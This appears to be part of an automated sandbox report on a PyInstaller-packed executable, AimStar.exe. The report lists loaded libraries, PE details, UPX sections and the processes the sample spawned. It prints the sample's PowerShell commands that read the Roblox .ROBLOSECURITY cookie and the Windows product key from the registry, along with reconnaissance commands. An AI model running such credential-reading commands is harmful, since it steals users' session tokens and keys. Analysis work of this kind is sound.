Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Section loaded: cryptbase.dll

Source: C:\Windows\System32\tasklist.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: AimStar.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: AimStar.exe

Static file information: File size 8116372 > 1048576

Source: AimStar.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: AimStar.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: AimStar.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: AimStar.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: AimStar.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: AimStar.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: AimStar.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: AimStar.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: AimStar.exe, 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: AimStar.exe, 00000002.00000002.2417417497.00007FF8A865A000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: AimStar.exe, 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.pdb source: powershell.exe, 00000039.00000002.2230160700.000002A6B83B5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: AimStar.exe, 00000000.00000003.2018153731.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2424874825.00007FF8BFAC4000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: AimStar.exe, 00000002.00000002.2417417497.00007FF8A85C2000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: AimStar.exe, 00000000.00000003.2018153731.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2424874825.00007FF8BFAC4000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2417417497.00007FF8A865A000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.pdbhPV source: powershell.exe, 00000039.00000002.2230160700.000002A6B83B5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000058.00000000.2307864420.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2424223799.00007FF8B9F61000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2423338250.00007FF8B8F71000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2421608946.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: AimStar.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: AimStar.exe, 00000002.00000002.2423019564.00007FF8B8B3B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2423964051.00007FF8B9841000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: AimStar.exe, 00000002.00000002.2423019564.00007FF8B8B3B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2423705275.00007FF8B93C1000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2422349344.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2422715924.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: AimStar.exe, 00000002.00000002.2419478466.00007FF8A8CD9000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2421997867.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp

Source: AimStar.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: AimStar.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: AimStar.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: AimStar.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: AimStar.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: VCRUNTIME140.dll.0.dr

Static PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline"

Source: C:\Users\user\Desktop\AimStar.exe

Code function: 2_2_00007FF8A8200330 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FF8A8200330

Source: libffi-8.dll.0.dr	Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A815AC25 push rcx; ret	2_2_00007FF8A815AC62
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF8474CD2A5 pushad ; iretd	12_2_00007FF8474CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF8475E9E38 push E9609479h; ret	12_2_00007FF8475E9E79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF8475E9E7A push E9609479h; ret	12_2_00007FF8475E9E79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF8476B9266 push esi; iretd	12_2_00007FF8476B9267

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\AimStar.exe

Process created: "C:\Users\user\Desktop\AimStar.exe"

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
